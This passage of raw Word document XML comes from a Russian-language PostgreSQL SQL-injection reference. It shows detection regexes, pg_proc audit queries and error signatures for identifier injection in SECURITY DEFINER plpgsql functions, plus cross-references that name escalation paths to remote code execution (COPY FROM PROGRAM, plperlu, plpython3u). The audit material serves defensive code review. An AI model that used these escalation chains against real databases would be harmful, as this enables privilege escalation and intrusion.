      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.2: lower() перед quote_ident (case-fold bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7D542" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"lower\s*\([^)]+\)[^)]*&lt;&gt;\s*ALL", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED2BC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"lower\s*\([^)]+\)[^)]*=\s*ANY", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB55338" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A469B0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.5: SECURITY DEFINER + EXECUTE без %I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B750E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует pg_proc.prosecdef = true cross-check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7D8E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22390317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003855C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># pg_proc-уровневые queries для runtime-аудита</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FBDFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IDENTIFIER_INJECTION_PROC_AUDITS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04684EB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SD-функции с EXECUTE без format(%I)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A035A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D375CA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT n.nspname, p.proname FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA57D3"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7C37F55E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD0E70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc ~ '\\bEXECUTE\\b'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF98C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc !~ '\\bformat\\s*\\(.*%I'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D841B8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021B83B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SD-функции без SET search_path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A57844" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F039176" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT n.nspname, p.proname FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F01DA7"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24AE7BF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D59215" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.proconfig IS NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20521F0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DED06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Функции с || в EXECUTE без USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFAB49B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EF6557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT n.nspname, p.proname FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F9BF0"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62DE1E27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosrc ~ '\\bEXECUTE\\s.*\\|\\|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37A172" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc !~ '\\bUSING\\b'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3739861B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA7EAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A3D30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A36D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IDENTIFIER_INJECTION_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00261512" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500313E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "syntax error at or near \"\\$1\"",   # попытка USING для identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F5FE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "relation \".*\" does not exist",     # failed identifier injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE3698" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757148B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FFC371" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IDENTIFIER_INJECTION_RISK = 9   # critical — direct RCE channel в SD-функциях</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF97EA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эти rules ловят statically-detectable шаблоны при code-review и runtime через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> audit-queries. SECURITY DEFINER cross-check — обязательный шаг любого аудита plpgsql-кодбазы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B78EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAC370" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload в 3.16.1/3.16.4 — это classic stacked-injection. Граница: 3.5 — Wire Protocol; 3.16 — внутри plpgsql EXECUTE (всегда multi-statement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B886119" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — application-side analog identifier-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01EBDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс injection в SQL clauses, не identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2CA83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel class privilege escalation в SD-функциях. Граница: 3.13.6 — name resolution через pg_temp; 3.16.5 — text injection в EXECUTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFF122" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — finale RCE для 3.16.5 (под superuser-owned SD-функцией).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32949E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2 plperlu, 3.7.3 plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернативные RCE-пути через 3.16.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527C677C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — канал extraction для 3.16.4 Variant A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099AE414" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2 to_tsquery operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс semantic-injection (operator-language vs identifier-position).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C998D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая reference; 3.16 показывает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>серверную сторону</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (USING в plpgsql).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B783C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — сводная reference по защитным функциям.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10709B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — снижение severity 3.16.5 через ограничение privileges owner-ов SD-функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCF035" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
